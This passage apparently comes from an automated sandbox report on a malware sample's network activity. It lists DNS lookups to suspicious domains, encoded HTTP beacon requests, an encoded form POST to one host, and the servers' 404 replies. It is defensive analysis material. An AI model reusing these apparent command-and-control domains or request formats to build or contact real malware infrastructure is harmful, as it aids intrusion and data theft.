            Performs DNS queries to domains with low reputation
            Source: DNS query: www.ngmr.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.huyven.xyz
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: ZOHO-ASUS ZOHO-ASUS
            Source: Joe Sandbox ViewASN Name: xneeloZA xneeloZA
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /fu87/?2Zv0=qtmpl4wh&FbuX5DnP=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ngmr.xyzUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /czka/?FbuX5DnP=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.drivedoge.websiteUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /exug/?2Zv0=qtmpl4wh&FbuX5DnP=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fieldelse.netUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.patioprojex.africaUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.animekuid.xyzUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /dbbh/?FbuX5DnP=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.huyven.xyzUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /fbcx/?FbuX5DnP=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dverkom.storeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /iq05/?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.longfilsalphonse.netUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bayarcepat19.clickUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /jo6v/?FbuX5DnP=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wdeb18.topUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /sfat/?2Zv0=qtmpl4wh&FbuX5DnP=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /zlyl/?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dto20.shopUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficHTTP traffic detected: GET /ni9w/?FbuX5DnP=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&2Zv0=qtmpl4wh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.h5hph710am.siteUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
            Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.drivedoge.website
            Source: global trafficDNS traffic detected: DNS query: www.fieldelse.net
            Source: global trafficDNS traffic detected: DNS query: www.patioprojex.africa
            Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
            Source: global trafficDNS traffic detected: DNS query: www.huyven.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
            Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
            Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
            Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
            Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
            Source: global trafficDNS traffic detected: DNS query: www.dto20.shop
            Source: global trafficDNS traffic detected: DNS query: www.h5hph710am.site
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: unknownHTTP traffic detected: POST /czka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 209Host: www.drivedoge.websiteOrigin: http://www.drivedoge.websiteReferer: http://www.drivedoge.website/czka/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)Data Raw: 46 62 75 58 35 44 6e 50 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d Data Ascii: FbuX5DnP=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Mon, 30 Sep 2024 18:19:39 GMTX-Varnish: 1107661128Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:57:15 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:57:18 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:57:20 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:57:23 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta 